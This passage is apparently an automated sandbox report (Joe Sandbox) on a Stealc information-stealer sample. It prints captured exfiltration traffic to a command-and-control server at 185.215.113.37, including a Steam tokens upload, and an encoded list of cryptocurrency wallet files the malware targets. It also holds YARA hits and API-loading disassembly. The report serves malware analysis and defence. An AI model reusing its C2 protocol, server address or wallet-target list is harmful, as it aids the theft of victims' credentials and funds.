46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 18:27:19.511781931 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFH Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"ybncbhylepme------FIJKEHJJDAAKFHIDAKFH--
Sep 26, 2024 18:27:19.744299889 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:19 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2406 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 26, 2024 18:27:19.757230997 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="file"------AEHIJKKFHIEGCBGCAFIJ--
Sep 26, 2024 18:27:20.491151094 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:20.525197983 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="message"files------HIDHIEGIIIECAKEBFBAA--
Sep 26, 2024 18:27:20.751987934 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:20.753473997 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCB Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGHJKFHJJJKJJJJKEHCB--
Sep 26, 2024 18:27:21.478564024 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	12:26:56
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf0000
File size:	1'824'768 bytes
MD5 hash:	4F821793C9107CC4C9F85967114C424C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1711129405.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	21.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00109860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00CD21D0), ref: 001098A1
GetProcAddress.KERNEL32(74DD0000,00CD2320), ref: 001098BA
GetProcAddress.KERNEL32(74DD0000,00CD2458), ref: 001098D2
GetProcAddress.KERNEL32(74DD0000,00CD21E8), ref: 001098EA
GetProcAddress.KERNEL32(74DD0000,00CD23F8), ref: 00109903
GetProcAddress.KERNEL32(74DD0000,00CD8FD0), ref: 0010991B
GetProcAddress.KERNEL32(74DD0000,00CC5770), ref: 00109933
GetProcAddress.KERNEL32(74DD0000,00CC5890), ref: 0010994C
GetProcAddress.KERNEL32(74DD0000,00CD2410), ref: 00109964
GetProcAddress.KERNEL32(74DD0000,00CD2248), ref: 0010997C
GetProcAddress.KERNEL32(74DD0000,00CD2200), ref: 00109995
GetProcAddress.KERNEL32(74DD0000,00CD2218), ref: 001099AD
GetProcAddress.KERNEL32(74DD0000,00CC58B0), ref: 001099C5
GetProcAddress.KERNEL32(74DD0000,00CD2440), ref: 001099DE
GetProcAddress.KERNEL32(74DD0000,00CD2260), ref: 001099F6
GetProcAddress.KERNEL32(74DD0000,00CC5710), ref: 00109A0E
GetProcAddress.KERNEL32(74DD0000,00CD2278), ref: 00109A27
GetProcAddress.KERNEL32(74DD0000,00CD22A8), ref: 00109A3F
GetProcAddress.KERNEL32(74DD0000,00CC5990), ref: 00109A57
GetProcAddress.KERNEL32(74DD0000,00CD22C0), ref: 00109A70
GetProcAddress.KERNEL32(74DD0000,00CC56F0), ref: 00109A88
LoadLibraryA.KERNEL32(00CD2530,?,00106A00), ref: 00109A9A
LoadLibraryA.KERNEL32(00CD2470,?,00106A00), ref: 00109AAB
LoadLibraryA.KERNEL32(00CD24B8,?,00106A00), ref: 00109ABD
LoadLibraryA.KERNEL32(00CD24D0,?,00106A00), ref: 00109ACF
LoadLibraryA.KERNEL32(00CD2500,?,00106A00), ref: 00109AE0
GetProcAddress.KERNEL32(75A70000,00CD2488), ref: 00109B02
GetProcAddress.KERNEL32(75290000,00CD24A0), ref: 00109B23
GetProcAddress.KERNEL32(75290000,00CD24E8), ref: 00109B3B
GetProcAddress.KERNEL32(75BD0000,00CD2518), ref: 00109B5D
GetProcAddress.KERNEL32(75450000,00CC5730), ref: 00109B7E
GetProcAddress.KERNEL32(76E90000,00CD8EA0), ref: 00109B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00109BB6

Strings

NtQueryInformationProcess, xrefs: 00109BAA

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: d57aa05011a28969e3f77b653bfdf81bad7c7d2cae6cbc15a6c5111248346a67
Instruction ID: e3663ddef6a511c2206d8bb2d9ab0aa35aaddc72d1837db2481c41541c9783ea
Opcode Fuzzy Hash: d57aa05011a28969e3f77b653bfdf81bad7c7d2cae6cbc15a6c5111248346a67
Instruction Fuzzy Hash: E7A17AB5504A00AFD346EFA8EDC8E663BFDF75C301F04851AA695C7274D739A841DB12

Function 000F45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 000F460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000F479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000F45E8

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
